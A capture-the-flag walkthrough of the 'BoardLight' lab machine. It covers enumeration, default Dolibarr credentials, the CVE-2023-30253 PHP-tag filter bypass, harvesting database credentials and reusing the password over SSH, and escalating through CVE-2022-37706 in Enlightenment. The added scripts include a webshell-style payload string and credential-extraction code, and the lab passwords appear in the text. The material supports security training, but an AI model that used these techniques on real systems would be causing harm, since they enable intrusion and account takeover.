BoardLight (Linux · Easy)

CVE-2023-30253 + CVE-2022-37706

Enumeration

nmap

nmap -A -Pn -v -T4 10.10.11.11

Nmap scan report for board.htb (10.10.11.11)
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add a hosts entry

echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

gobuster

gobuster vhost -u http://board.htb --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

(screenshot: gobuster vhost output, which turns up crm.board.htb)

Add a hosts entry for the vhost

echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

dirsearch

dirsearch -u http://board.htb
(nothing of interest on board.htb)
dirsearch -u http://crm.board.htb

board.htb

(screenshot: board.htb landing page)

crm.board.htb

(screenshot: crm.board.htb Dolibarr login page)

Weak credentials

admin:admin

Google search for the Dolibarr version

(screenshot: search results for the Dolibarr version, leading to CVE-2023-30253)

Exploit CVE-2023-30253 for a reverse shell

(screenshot: exploit run and reverse shell caught as www-data)
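What CVE-2023-30253 actually abuses, as an added example that is not the writeup's commands or Dolibarr's own code: in Dolibarr 17.0.0 and earlier, a logged-in user with website edit rights could get PHP executed because the server-side check for PHP code only matched the lowercase `<?php` opening tag, while PHP treats the tag case-insensitively, so `<?PHP ... ?>` slipped through. The toy filter below models that check beside a case-insensitive replacement; the three page bodies are constructed inputs, not content from the box.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup or Dolibarr's code): a toy model of the
# CVE-2023-30253 filter bypass. The pre-fix check only looked for the lowercase
# "<?php" tag; the PHP engine also accepts "<?PHP", so uppercase got through.

# Constructed page bodies, as a website editor might submit them.
PAGE_LOWER='<section><?php echo "hi"; ?></section>'
PAGE_UPPER='<section><?PHP system($_GET["c"]); ?></section>'
PAGE_CLEAN='<section>hello</section>'

# Vulnerable check: case-sensitive match. Exit 0 = "rejected" (tag found),
# exit 1 = "accepted" (nothing found, body stored as-is).
vuln_filter_rejects() {
    printf '%s' "$1" | grep -q '<?php'
}

# Hardened check: case-insensitive, and also catches the short "<?" open tag
# and the "<?=" echo tag, which PHP runs as code when short_open_tag is on.
hardened_filter_rejects() {
    printf '%s' "$1" | grep -qiE '<\?(php|=|[[:space:]])'
}

# classify <filter-fn> <body> -> "accepted" or "rejected", so the outcome is a
# value the caller can compare rather than only an exit status.
classify() {
    if "$1" "$2"; then echo rejected; else echo accepted; fi
}

# Stand-alone run: show what each filter does with each body.
for body in "$PAGE_LOWER" "$PAGE_UPPER" "$PAGE_CLEAN"; do
    printf 'vulnerable=%s hardened=%s  %s\n' \
        "$(classify vuln_filter_rejects "$body")" \
        "$(classify hardened_filter_rejects "$body")" \
        "$body"
done
```

The uppercase body is the one the exploit relies on: the vulnerable filter accepts it, the hardened one rejects it, and the plain HTML body passes both.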

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

(screenshot: conf.php contents)

$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

The database holds little beyond the website's own data, so guess at password reuse instead: list the users with a login shell and try the DB password over SSH.

(screenshot: users with a login shell in /etc/passwd)

(screenshot: SSH login as larissa with the reused DB password)
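The credential-reuse step above, as an added example (these are not the writeup's commands): pull the DB credentials out of a conf.php fragment and list the local accounts with an interactive shell, which is the candidate list for the SSH attempt. Both inputs are constructed copies of what the screenshots show; on the box you would feed the functions the real conf.php and /etc/passwd, and the `sshpass` line is only a suggestion, not run.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: harvest DB credentials from a Dolibarr
# conf.php and list the accounts worth trying them against over SSH.

# Constructed conf.php fragment (the two values are those shown in the writeup).
CONF_PHP=$(cat <<'EOF'
<?php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_name='dolibarr';
EOF
)

# Constructed /etc/passwd excerpt.
PASSWD=$(cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
EOF
)

# conf_value <conf-text> <variable-name> -> the single-quoted value, unquoted.
# sed keeps everything between the first pair of single quotes, so "$" and "!"
# inside the password survive untouched (no shell expansion happens on them).
conf_value() {
    printf '%s\n' "$1" | sed -n "s/^\\\$$2='\\([^']*\\)';.*/\\1/p" | head -n1
}

# shell_users <passwd-text> -> space-separated logins whose shell is bash/sh/zsh.
# Filters on the shell field rather than UID so that root is included too.
shell_users() {
    printf '%s\n' "$1" | awk -F: '$7 ~ /\/(ba|z)?sh$/ {print $1}' | tr '\n' ' ' | sed 's/ $//'
}

DB_USER=$(conf_value "$CONF_PHP" dolibarr_main_db_user)
DB_PASS=$(conf_value "$CONF_PHP" dolibarr_main_db_pass)
echo "db user: $DB_USER"
echo "db pass: $DB_PASS"
echo "try the password against: $(shell_users "$PASSWD")"
# Live attempt, not run here:  sshpass -p "$DB_PASS" ssh larissa@board.htb
```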

Privilege escalation

(screenshot: local enumeration output pointing at enlightenment)

enlightenment is installed; check its version.

(screenshot: installed enlightenment version)

Google search for the Enlightenment version

(screenshot: search results for the Enlightenment version, leading to CVE-2022-37706)
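Before copying an exploit over, a quick triage for CVE-2022-37706, as an added example that is not taken from the writeup or from the exploit it uses: the CVE record describes the setuid-root helper `enlightenment_sys` in Enlightenment before 0.25.4 mishandling mount pathnames that begin with `/dev/..`, so the two things to confirm are that the helper is present with the setuid bit and that the installed version predates 0.25.4. The setuid listing below is constructed; on a live host feed `find_setuid_helper` the output of `find / -perm -4000 -type f 2>/dev/null`, and read the version from `dpkg-query` as shown in the comment.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: triage for CVE-2022-37706 on a host.
# The bug lives in the setuid helper enlightenment_sys shipped with
# Enlightenment before 0.25.4. Confirm (a) the helper exists and is setuid root
# and (b) the installed version is below the fixed release before going further.

FIXED_VERSION="0.25.4"   # first release with the fix, per the CVE record

# version_lt <a> <b>: exit 0 if a sorts strictly before b in dotted-numeric
# order (GNU sort -V, which also copes with Debian suffixes like 0.23.1-3ubuntu1).
version_lt() {
    [ "$1" != "$2" ] && [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n1)" = "$1" ]
}

# enlightenment_vulnerable <installed-version> -> "yes" or "no"
enlightenment_vulnerable() {
    if version_lt "$1" "$FIXED_VERSION"; then echo yes; else echo no; fi
}

# find_setuid_helper <find-output-text> -> path of enlightenment_sys if listed,
# otherwise an empty string. Takes the listing as text so it can be run on a
# constructed sample; live use:
#   find_setuid_helper "$(find / -perm -4000 -type f 2>/dev/null)"
find_setuid_helper() {
    printf '%s\n' "$1" | grep -m1 '/enlightenment_sys$' || true
}

# Constructed find(1) output for the stand-alone run (path is an assumption).
SETUID_LIST='/usr/bin/sudo
/usr/bin/passwd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/bin/su'

helper=$(find_setuid_helper "$SETUID_LIST")
echo "setuid helper: ${helper:-not found}"
# Live version lookup on Ubuntu/Debian:
#   dpkg-query -W -f='${Version}\n' enlightenment
for v in 0.23.1-3ubuntu1 0.25.3 0.25.4 0.26.0; do
    echo "enlightenment $v vulnerable: $(enlightenment_vulnerable "$v")"
done
```

If the helper is missing or the version is 0.25.4 or later, the scp/chmod/run sequence that follows is wasted effort and a noisier footprint; check first.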

Copy the exploit over with scp

scp exploit.sh larissa@board.htb:/tmp

Make it executable and run it

(screenshot: exploit.sh made executable and executed)
